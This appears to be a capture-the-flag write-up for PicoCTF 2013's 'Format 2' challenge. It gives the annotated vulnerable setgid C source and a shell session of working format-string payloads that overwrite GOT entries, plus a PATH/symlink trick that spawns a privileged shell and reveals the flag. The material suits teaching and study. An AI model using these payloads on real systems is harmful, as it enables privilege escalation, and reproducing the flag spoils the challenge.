# PicoCTF 2k13 - Format 2


$ cat format2.c
#undef _FORTIFY_SOURCE  /* keeps glibc's fortified printf from rejecting %n in a writable format */
#define _GNU_SOURCE     /* setresgid() is a GNU extension declared in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>  /* gid_t */
#include <unistd.h>     /* getegid(), setresgid() - previously used without a prototype */

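/*
 * Make the real, effective and saved group IDs all equal to the current
 * effective GID.
 *
 * system() runs "/bin/sh -c", and when /bin/sh is bash it drops a setgid
 * effective GID that differs from the real one; equalising the three IDs
 * first keeps the privileged group in the spawned shell.
 *
 * setresgid() can fail (e.g. EPERM).  Ignoring that would leave the process
 * in a privilege state the rest of the program does not expect (CERT
 * POS36-C/POS37-C: check the result of privilege-changing calls), so a
 * failure is reported and treated as fatal.  On the success path the effect
 * is identical to the original unchecked call.
 */
void be_nice_to_people(void) {
    gid_t effective = getegid();
    if (setresgid(effective, effective, effective) != 0) {
        perror("setresgid");
        exit(EXIT_FAILURE);
    }
}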

/*
 * Entry point: formats argv[1] into a stack buffer, prints it, then runs
 * /bin/ls through system() with the group privileges that
 * be_nice_to_people() preserved.
 *
 * This is the deliberately vulnerable target of the challenge; the exploit
 * session below depends on this exact code and stack layout, so the block is
 * annotated rather than rewritten.  What a reviewer would flag:
 *
 *  - argc is never checked: with no argument argv[1] is NULL and snprintf()
 *    receives a NULL format string.
 *  - argv[1] is passed as the *format* of snprintf(), not as a %s argument,
 *    so attacker-chosen directives are interpreted: %x leaks stack words and
 *    %n/%hn write to addresses embedded in the same string (the ltrace runs
 *    below use exactly that to overwrite GOT entries).
 *  - The 70-byte size only bounds what is stored in the buffer.  %n records
 *    the number of characters that *would* have been produced, so the huge
 *    widths in the exploit (see the snprintf return value in the ltrace
 *    output) are not limited by the buffer size at all.
 *  - buf is then used again as the format of printf(); any '%' that survives
 *    the first pass is interpreted a second time.
 *  - system("/bin/ls") spawns "/bin/sh -c".  The final exploit redirects a
 *    later PLT call into this call site and lets the shell resolve a
 *    controlled command name through PATH.
 *
 * The non-CTF fix is snprintf(buf, sizeof buf, "%s", argv[1]) and
 * printf("%s", buf) (or fputs), plus an argc check, and no system().
 */
int main(int argc, const char **argv) {
    be_nice_to_people();
    char buf[80];
    /* format-string sink #1: attacker controls the format; %n writes happen here */
    snprintf(buf, 70, argv[1]);
    /* format-string sink #2: buf is attacker-derived data used as a format */
    printf(buf);
    /* the compiler turns this into a putchar() call (see disassembly below);
     * its GOT slot is the one the final exploit overwrites */
    printf("\n");
    /* runs via /bin/sh -c; the setgid group survives thanks to be_nice_to_people() */
    system("/bin/ls");
    exit(0);
}
$ objdump -R format2
format2:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a000 R_386_JUMP_SLOT   printf
0804a004 R_386_JUMP_SLOT   getegid
0804a008 R_386_JUMP_SLOT   system
0804a00c R_386_JUMP_SLOT   __gmon_start__
0804a010 R_386_JUMP_SLOT   exit
0804a014 R_386_JUMP_SLOT   __libc_start_main
0804a018 R_386_JUMP_SLOT   snprintf
0804a01c R_386_JUMP_SLOT   putchar
0804a020 R_386_JUMP_SLOT   setresgid
$ gdb -q format2
(gdb) x/xw 0x0804a008
0x804a008 : 0x080483e6
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804852d <+0>: push   ebp
   0x0804852e <+1>: mov    ebp,esp
   0x08048530 <+3>: and    esp,0xfffffff0
   0x08048533 <+6>: add    esp,0xffffff80
   0x08048536 <+9>: mov    eax,DWORD PTR [ebp+0xc]
   0x08048539 <+12>: mov    DWORD PTR [esp+0x1c],eax
   0x0804853d <+16>: mov    eax,gs:0x14
   0x08048543 <+22>: mov    DWORD PTR [esp+0x7c],eax
   0x08048547 <+26>: xor    eax,eax
   0x08048549 <+28>: call   0x8048504 <be_nice_to_people>
   0x0804854e <+33>: mov    eax,DWORD PTR [esp+0x1c]
   0x08048552 <+37>: add    eax,0x4
   0x08048555 <+40>: mov    eax,DWORD PTR [eax]
   0x08048557 <+42>: mov    DWORD PTR [esp+0x8],eax
   0x0804855b <+46>: mov    DWORD PTR [esp+0x4],0x46
   0x08048563 <+54>: lea    eax,[esp+0x2c]
   0x08048567 <+58>: mov    DWORD PTR [esp],eax
   0x0804856a <+61>: call   0x8048420 <snprintf@plt>
   0x0804856f <+66>: lea    eax,[esp+0x2c]
   0x08048573 <+70>: mov    DWORD PTR [esp],eax
   0x08048576 <+73>: call   0x80483c0 <printf@plt>
   0x0804857b <+78>: mov    DWORD PTR [esp],0xa
   0x08048582 <+85>: call   0x8048430 <putchar@plt>
   0x08048587 <+90>: mov    DWORD PTR [esp],0x8048670
   0x0804858e <+97>: call   0x80483e0 <system@plt>
   0x08048593 <+102>: mov    DWORD PTR [esp],0x0
   0x0804859a <+109>: call   0x8048400 <exit@plt>
End of assembler dump.
$ # 0x804a000 <printf@got.plt>: 0x080483c6 --> 0x080483e6
$ ltrace ./format2 `python -c 'print "/bin/sh;" + "\x02\xd6\xff\xff" + "\x0f\xd6\xff\xff" + "\x90"*4 + "\x01\xa0\x04\x08" + "%x"*9 + "%.31x" + "%hn" + "%hn" + "%134513534d" + "%n"'`
__libc_start_main(0x804852d, 2, -10508, 0x80485a0, 0x8048610 <unfinished ...>
getegid()                                                                                                           = 8013
setresgid(8013, 8013, 8013, 0xf7ffd918, 0)                                                                          = 0
snprintf("/bin/sh", 70, "/bin/sh;\002\326\377\377\017\326"..., 0xf7ff249c, 0xffffd694, 0, 0)                        = 134513638
printf("/bin/sh"sh-4.2$ id
uid=8013(user6748) gid=8013(user6748) groups=8013(user6748)
$ ./format2 `python -c 'print "/bin/sh;" + "\x02\xd6\xff\xff" + "\x0f\xd6\xff\xff" + "\x90"*4 + "\x01\xa0\x04\x08" + "%x"*9 + "%.31x" + "%hn" + "%hn" + "%134513534d" + "%n"'`
Segmentation fault
$ # 0x804a000 <printf@got.plt>: 0x080483c6 --> 0x080483e6
$ ltrace ./format2 `python -c 'print "/bin/sh;" + "\x1b\xd6\xff\xff" + "\x90"*4 + "\x01\xa0\x04\x08" + "%x"*10 + "%hn" + "%134513561d" + "%n"'`
__libc_start_main(0x804852d, 2, -10492, 0x80485a0, 0x8048610 <unfinished ...>
getegid()                                                                                                           = 8013
setresgid(8013, 8013, 8013, 0xf7ffd918, 0)                                                                          = 0
snprintf("/bin/sh;\033\326\377\377\220\220\220M", 70, "/bin/sh;\033\326\377\377\220\220"..., 0xf7ff249c, 0xffffd6a4, 0, 0, 0xffffd704, 0x80482cb) = 134513638
printf("/bin/sh;\033\326\377\377\220\220"...sh-4.2$ id
uid=8013(user6748) gid=8013(user6748) groups=8013(user6748)
$ ./format2 `python -c 'print "/bin/sh;" + "\x1b\xd6\xff\xff" + "\x90"*4 + "\x01\xa0\x04\x08" + "%x"*10 + "%hn" + "%134513561d" + "%n"'`
Illegal instruction
$ # 0x804a01c <putchar@got.plt>: 0x08048436 --> 0x0804858e
$ export PATH=$PATH:$HOME
$ ln -s /bin/dash $HOME/$'\307\004\206\004\b\350M\376\377\377\307\004$'
$ ./format2 `python -c 'print "\x1c\xa0\x04\x08" + "%134514058d" + "%9$n"'`
$ id
uid=8013(user6748) gid=3006(format2) groups=8013(user6748)
$ cat key
now_youre_a_format_string_master
